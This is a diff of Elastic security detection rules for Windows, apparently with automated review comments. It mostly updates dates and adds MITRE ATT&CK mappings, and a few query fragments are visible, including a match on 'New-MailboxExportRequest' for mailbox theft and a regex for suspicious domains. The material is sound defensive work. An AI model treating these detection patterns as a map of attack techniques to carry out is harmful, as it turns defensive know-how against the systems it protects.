+updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -72,14 +72,18 @@ Elastic Endgame is a security solution that monitors and detects unauthorized ac [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml index 9b43b081eca..e9b282cff18 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,14 +72,18 @@ Elastic Endgame is a security solution that prevents unauthorized access by moni [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml index 97ba3fb44a3..972be2ad55e 100644 --- a/rules/windows/collection_email_powershell_exchange_mailbox.toml +++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml 
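Review bot: The added `[[rule.threat.technique.subtechnique]]` for `T1134.001` is placed directly after the T1134 `reference` line with no separating blank line, while the rest of this commit (for example the T1136.001 and T1219.003 hunks) inserts a `+` blank line before each new sub-technique table. The same missing blank occurs in the permission_theft_prevented hunk on this line and in the T1218 (dns_susp_tld), T1071.004, T1567.003 and T1059.007 additions further down. A single `+` line before each `+[[rule.threat.technique.subtechnique]]` would make the threat sections uniformly formatted, which matters if a normalizer is expected to reproduce this layout on the next rule update.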
@@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,6 +102,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" @@ -111,32 +112,36 @@ reference = "https://attack.mitre.org/techniques/T1005/" id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.001" +name = "Local Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/001/" + [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml index 90ae0bf3cf8..d64dc4b3d6e 100644 --- a/rules/windows/collection_mailbox_export_winlog.toml +++ b/rules/windows/collection_mailbox_export_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -120,15 +120,22 @@ powershell.file.script_block_text : "New-MailboxExportRequest" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" reference = "https://attack.mitre.org/techniques/T1005/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" @@ -139,13 +146,10 @@ id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml index 3f922888c59..3f57ec219d6 100644 --- a/rules/windows/collection_posh_audio_capture.toml +++ b/rules/windows/collection_posh_audio_capture.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -129,39 +129,52 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1123" name = "Audio Capture" reference = "https://attack.mitre.org/techniques/T1123/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1120" +name = "Peripheral Device Discovery" +reference = "https://attack.mitre.org/techniques/T1120/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml index d2af75605fd..e546a3f7a86 100644 --- a/rules/windows/command_and_control_certreq_postdata.toml +++ b/rules/windows/command_and_control_certreq_postdata.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -135,38 +135,49 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml index 0c00e93c80e..cb304b5211b 100644 --- a/rules/windows/command_and_control_common_webservices.toml +++ b/rules/windows/command_and_control_common_webservices.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/12" +updated_date = "2026/03/24" [transform] [[transform.investigate]] 
@@ -339,33 +339,57 @@ network where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" -[[rule.threat.technique.subtechnique]] -id = "T1090.002" -name = "External Proxy" -reference = "https://attack.mitre.org/techniques/T1090/002/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" 
@@ -373,6 +397,7 @@ framework = "MITRE ATT&CK" id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.001" name = "Exfiltration to Code Repository" @@ -383,10 +408,12 @@ id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - +[[rule.threat.technique.subtechnique]] +id = "T1567.003" +name = "Exfiltration to Text Storage Sites" +reference = "https://attack.mitre.org/techniques/T1567/003/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_dns_susp_tld.toml b/rules/windows/command_and_control_dns_susp_tld.toml index f4611ddfc9f..389874743d4 100644 --- a/rules/windows/command_and_control_dns_susp_tld.toml +++ b/rules/windows/command_and_control_dns_susp_tld.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -87,19 +87,41 @@ dns.question.name regex """.*\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.004" name = "DNS" reference = "https://attack.mitre.org/techniques/T1071/004/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml index a9db0f9e470..f04720d6889 100644 --- a/rules/windows/command_and_control_iexplore_via_com.toml +++ b/rules/windows/command_and_control_iexplore_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
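Review bot: The new Defense Evasion entry (`T1127.001` MSBuild and `T1218`) is not supported by anything visible in this hunk — the only query context shown is the `dns.question.name regex` on suspicious TLDs, which observes DNS resolution rather than proxy execution through a system binary. If the full query constrains `process.name` to MSBuild or other signed binaries, a sentence in the rule description tying the DNS lookup to that process filter would justify the mapping; if it does not, the entry overstates coverage and should be removed. Adding the tactic also implies a matching `Tactic: Defense Evasion` tag, which no hunk for this file shows.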
@@ -89,31 +89,59 @@ Internet Explorer can be manipulated via the Component Object Model (COM) to ini [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml b/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml index 8a0b48ac497..6effc3fefe1 100644 --- a/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml +++ b/rules/windows/command_and_control_multiple_rmm_vendors_same_host.toml 
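Review bot: `T1071.004` DNS is added as a sub-technique of the existing C2 mapping, but the hunk context describes Internet Explorer being driven through COM to initiate connections, not DNS-based command and control; unless the rule's query inspects DNS events, this sub-technique only adds noise to the rule's ATT&CK coverage. The new Defense Evasion table (`T1218.010` Regsvr32, `T1218.011` Rundll32) likewise needs a corresponding process constraint in the query to be accurate — confirm against the full query, which lies outside the hunk, and add the `Tactic: Defense Evasion` tag if the table stays.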
@@ -9,7 +9,7 @@ integration = [ "crowdstrike", ] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -195,15 +195,22 @@ from logs-endpoint.events.process-*, endgame-*, logs-crowdstrike.fdr*, logs-m365 [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + [[rule.threat.technique.subtechnique]] id = "T1219.002" name = "Remote Desktop Software" reference = "https://attack.mitre.org/techniques/T1219/002/" +[[rule.threat.technique.subtechnique]] +id = "T1219.003" +name = "Remote Access Hardware" +reference = "https://attack.mitre.org/techniques/T1219/003/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml b/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml index 04953eaf7da..6d26994f276 100644 --- a/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml +++ b/rules/windows/command_and_control_new_terms_commonly_abused_rmm.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/03" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
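Review bot: `T1219.003` "Remote Access Hardware" is added to a rule whose visible query context reads process events (`from logs-endpoint.events.process-*, endgame-*, ...`); in ATT&CK that sub-technique covers physical devices such as IP-based KVMs rather than RMM software, so the mapping does not match what the rule can observe. The same sub-technique is added in the command_and_control_new_terms_commonly_abused_rmm hunk below. Unless the monitored process list includes the companion software of such devices, keep `T1219.002` on its own, or state in the rule description which list entry justifies the hardware sub-technique.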
@@ -493,20 +493,31 @@ host.os.type: "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + +[[rule.threat.technique.subtechnique]] +id = "T1219.001" +name = "IDE Tunneling" +reference = "https://attack.mitre.org/techniques/T1219/001/" + [[rule.threat.technique.subtechnique]] id = "T1219.002" name = "Remote Desktop Software" reference = "https://attack.mitre.org/techniques/T1219/002/" +[[rule.threat.technique.subtechnique]] +id = "T1219.003" +name = "Remote Access Hardware" +reference = "https://attack.mitre.org/techniques/T1219/003/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml index e584f93e7a1..c4997d4fbd7 100644 --- a/rules/windows/command_and_control_outlook_home_page.toml +++ b/rules/windows/command_and_control_outlook_home_page.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -97,21 +97,26 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.004" name = "Outlook Home Page" reference = "https://attack.mitre.org/techniques/T1137/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml index 0e73d7b7ab7..51b0f50b658 100644 --- a/rules/windows/command_and_control_port_forwarding_added_registry.toml +++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
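Review bot: `T1112` "Modify Registry" is added under the `TA0003` Persistence tactic, but ATT&CK lists that technique only under Defense Evasion (`TA0005`), so a tactic-to-technique consistency check would reject this placement. The fix is to give T1112 its own `[[rule.threat]]` table with the TA0005 tactic (plus a matching `Tactic: Defense Evasion` tag, which is outside this hunk) and leave the Persistence table with `T1137.004` only.
```toml
# … unchanged: Command and Control table, Persistence table with T1137/T1137.004 only …
[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1112"
name = "Modify Registry"
reference = "https://attack.mitre.org/techniques/T1112/"

[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
```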
@@ -95,26 +95,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml index 14e373d6b5f..b3e6cdf4098 100644 --- a/rules/windows/command_and_control_rdp_tunnel_plink.toml +++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,31 +91,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique.subtechnique]] id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/command_and_control_remcos_rat_iocs.toml b/rules/windows/command_and_control_remcos_rat_iocs.toml index e7563a52d20..9b9784c5f2c 100644 --- a/rules/windows/command_and_control_remcos_rat_iocs.toml +++ b/rules/windows/command_and_control_remcos_rat_iocs.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,14 +91,49 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml index 9042a919ec0..ff5739466cc 100644 --- a/rules/windows/command_and_control_remote_file_copy_scripts.toml +++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -123,31 +123,36 @@ sequence by host.id, process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_screenconnect_childproc.toml b/rules/windows/command_and_control_screenconnect_childproc.toml index 8ae791c89f0..f7d5966fa87 100644 --- a/rules/windows/command_and_control_screenconnect_childproc.toml +++ b/rules/windows/command_and_control_screenconnect_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -107,14 +107,107 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = 
"https://attack.mitre.org/techniques/T1059/005/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_tool_transfer_via_curl.toml b/rules/windows/command_and_control_tool_transfer_via_curl.toml index 760413874e8..e7ad0618aec 100644 --- a/rules/windows/command_and_control_tool_transfer_via_curl.toml +++ b/rules/windows/command_and_control_tool_transfer_via_curl.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
